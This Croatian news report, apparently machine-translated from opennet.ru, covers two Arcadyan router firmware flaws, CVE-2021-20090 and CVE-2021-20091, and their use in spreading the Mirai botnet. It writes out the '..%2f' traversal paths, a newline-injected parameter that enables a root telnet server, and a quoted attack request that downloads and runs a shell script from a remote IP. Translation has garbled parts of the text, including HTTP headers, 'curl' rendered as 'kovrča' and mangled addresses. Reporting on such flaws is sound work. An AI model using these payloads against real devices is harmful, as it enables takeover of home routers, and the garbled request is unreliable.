Na mreži je zabilježen masovni napad na kućne usmjerivače čiji firmware koristi implementaciju HTTP poslužitelja tvrtke Arcadyan. Za stjecanje kontrole nad uređajima koristi se kombinacija dviju ranjivosti koja omogućuje daljinsko izvršavanje proizvoljnog koda s root pravima. Problem utječe na prilično širok raspon ADSL usmjerivača Arcadyana, ASUS-a i Buffala, kao i uređaja koji se isporučuju pod robnim markama Beeline (problem je potvrđen u Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone i drugim telekom operaterima. Napominje se da je problem prisutan u Arcadyan firmwareu više od 10 godina i tijekom tog vremena uspio je migrirati na najmanje 20 modela uređaja od 17 različitih proizvođača.
Prva ranjivost, CVE-2021-20090, omogućuje pristup bilo kojoj skripti web sučelja bez provjere autentičnosti. Bit ranjivosti je da su u web sučelju neki direktoriji kroz koje se šalju slike, CSS datoteke i JavaScript skripte dostupni bez autentifikacije. U ovom slučaju, direktoriji za koje je dopušten pristup bez provjere autentičnosti provjeravaju se pomoću početne maske. Firmware blokira navođenje znakova “../” u stazama za odlazak u nadređeni direktorij, ali se upotreba kombinacije “..%2f” preskače. Stoga je moguće otvoriti zaštićene stranice prilikom slanja zahtjeva poput “http://192.168.1.1/images/..%2findex.htm”.
Druga ranjivost, CVE-2021-20091, omogućuje autentificiranom korisniku da izvrši promjene u sistemskim postavkama uređaja slanjem posebno formatiranih parametara u skriptu apply_abstract.cgi, koja ne provjerava prisutnost znaka novog retka u parametrima. . Na primjer, prilikom izvođenja ping operacije, napadač može navesti vrijednost “192.168.1.2%0AARC_SYS_TelnetdEnable=1” u polju s IP adresom koja se provjerava i skriptom, prilikom kreiranja datoteke postavki /tmp/etc/config/ .glbcfg, upisat će redak “AARC_SYS_TelnetdEnable=1” u njega ", što aktivira telnetd poslužitelj, koji pruža neograničeni pristup naredbenoj ljusci s root pravima. Slično, postavljanjem parametra AARC_SYS, možete izvršiti bilo koji kod na sustavu. Prva ranjivost omogućuje pokretanje problematične skripte bez provjere autentičnosti pristupanjem kao “/images/..%2fapply_abstract.cgi”.
Kako bi iskoristio ranjivosti, napadač mora moći poslati zahtjev na mrežni priključak na kojem se izvodi web sučelje. Sudeći po dinamici širenja napada, mnogi operateri ostavljaju pristup svojim uređajima iz vanjske mreže kako bi servisu za podršku pojednostavili dijagnozu problema. Ako je pristup sučelju ograničen samo na unutarnju mrežu, napad se može izvesti s vanjske mreže koristeći tehniku "rebinding DNS-a". Ranjivosti se već aktivno koriste za povezivanje usmjerivača na Mirai botnet: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Veza: zatvori User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7. 0%1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; kovrča+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX
Izvor: opennet.ru